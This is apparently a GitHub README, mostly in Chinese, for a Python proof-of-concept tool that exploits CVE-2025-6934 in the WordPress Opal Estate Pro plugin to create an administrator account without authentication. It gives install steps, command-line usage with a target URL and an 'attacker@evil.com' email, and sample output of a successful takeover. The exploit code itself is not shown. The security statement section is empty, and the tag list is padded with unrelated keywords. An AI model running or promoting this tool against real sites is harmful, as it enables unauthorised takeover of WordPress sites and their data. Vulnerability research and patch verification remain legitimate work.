MejbanKadir/CVE-2025-6934-PoC

GitHub: MejbanKadir/CVE-2025-6934-PoC

针对 WordPress Opal Estate Pro 插件高危漏洞的 PoC 工具,支持未认证创建管理员账户,提供图形和命令行双界面。

Stars: 0 | Forks: 0

# 🔓 CVE-2025-6934 漏洞利用工具 ### WordPress 插件 Opal Estate Pro 未认证管理员账户创建
![Python](https://img.shields.io/badge/Python-3.8+-blue?style=flat&logo=python) ![PyQt6](https://img.shields.io/badge/PyQt6-GUI-green?style=flat) ![Status](https://img.shields.io/badge/Status-Active-success?style=flat) ![License](https://img.shields.io/badge/License-MIT-orange?style=flat) **由 mejbankadir 全权创建和开发** *(SMH tech 和 Mejban HackSheild 隶属 NexoAmicus)*
## 📋 描述 CVE-2025-6934 是 WordPress **Opal Estate Pro** 插件(版本 <= 1.7.5)中的一个严重漏洞,允许未经认证的攻击者在受影响的 WordPress 网站上创建管理员账户。 该工具提供 **CLI**(命令行)和 **GUI**(图形用户界面)两个版本来利用此漏洞。 ## ⚠️ 漏洞详情 | 属性 | 值 | |-----------|-------| | **CVE ID** | CVE-2025-6934 | | **严重程度** | Critical (CVSS 3.1: 9.8) | | **受影响插件** | Opal Estate Pro | | **受影响版本** | <= 1.7.5 | | **漏洞类型** | 未认证管理员账户创建 | | **CVSS 向量** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ## 🛠️ 安装 ### 前置条件 ``` # 克隆 repository git clone https://github.com/mejbankadir/CVE-2025-6934.git cd CVE-2025-6934 # 安装 dependencies pip install -r requirements.txt ``` ### 环境要求 ``` requests beautifulsoup4 colorama PyQt6 # For GUI version only ``` ## 🚀 用法 ### GUI 版本(推荐) ``` python3 CVE-2025-6934-GUI.py ``` **GUI 特性:** - 现代深色主题界面 - 实时利用进度 - 彩色控制台输出 - 输入验证 - 非阻塞执行 ### CLI 版本 ``` python3 CVE-2025-6934.py -u http://target.com -mail attacker@evil.com -password P@ssw0rd123 ``` **参数:** ``` -u, --url Target URL (required) -mail, --newmail Email for admin account (required) -password, --newpassword Password for admin account (required) -user, --username Username for admin account (default: administrator) ``` ## 📖 示例 ``` ┌─────────────────────────────────────────────────────────────┐ │ _____________ _______________ │ │ \_ ___ \ \ / /\_ _____/ │ │ / \ \/\ Y / | __)_ ______ │ │ \ \____\ / | \ /_____/ │ │ \______ / \___/ /_______ / │ │ \/ \/ │ │ │ │ CVE-2025-6934 Exploit PoC │ │ │ │ Created and developed fully by mejbankadir │ │ (SMH tech and Mejban HackSheild Under NexoAmicus) │ └─────────────────────────────────────────────────────────────┘ ``` ### CLI 示例 ``` $ python3 CVE-2025-6934.py -u http://example.com -mail admin@evil.com -password MyP@ss123 [•] Starting Exploit Attempt... [•] Nonce Found: a1b2c3d4e5f6... [✔] Exploit Successful! Username : administrator Email : admin@evil.com Password : MyP@ss123 Role : administrator ``` ## 🎨 特性 ### CLI 版本 - ✅ ASCII 艺术 Banner - ✅ 彩色输出(使用 colorama) - ✅ 版本检查 - ✅ Nonce 提取 - ✅ JSON 响应处理 ### GUI 版本 - ✅ 现代深色主题 UI - ✅ 实时控制台输出 - ✅ 输入验证 - ✅ 后台线程执行 - ✅ 状态栏 - ✅ 响应式设计 ## 🔒 安全声明 ## 📝 致谢 | 角色 | 名字 | |------|------| | **创建者 & 开发者** | **mejbankadir** | | **组织** | SMH tech & Mejban HackSheild 隶属 NexoAmicus | ## 📂 项目结构 ``` CVE-2025-6934/ ├── CVE-2025-6934.py # CLI version ├── CVE-2025-6934-GUI.py # GUI version ├── CVE-2025-6934.yaml # Documentation ├── requirements.txt # Python dependencies └── README.md # This file ``` ## 🐛 故障排除 ### SSL 证书错误 该工具会自动禁用 SSL 警告。如果您遇到问题: ``` requests.packages.urllib3.disable_warnings() ``` ### Nonce 提取失败 - 确保目标 URL 正确 - 检查是否安装了 Opal Estate Pro 插件 - 验证站点是否运行 WordPress ## 📜 许可证 MIT License 版权所有 (c) 2025 **mejbankadir** (SMH tech 和 Mejban HackSheild 隶属 NexoAmicus)
**由 mejbankadir 用 ❤️ 制作** *SMH tech | Mejban HackSheild | 隶属 NexoAmicus*
标签:CISA项目, CVE-2025-6934, CVSS 9.8, Exploit, GUI工具, Maven, Opal Estate Pro, POC, PyQt6, Python, Splunk, Web安全, WordPress插件, WordPress漏洞, 协议分析, 威胁模拟, 无后门, 未授权管理员创建, 权限提升, 漏洞验证, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞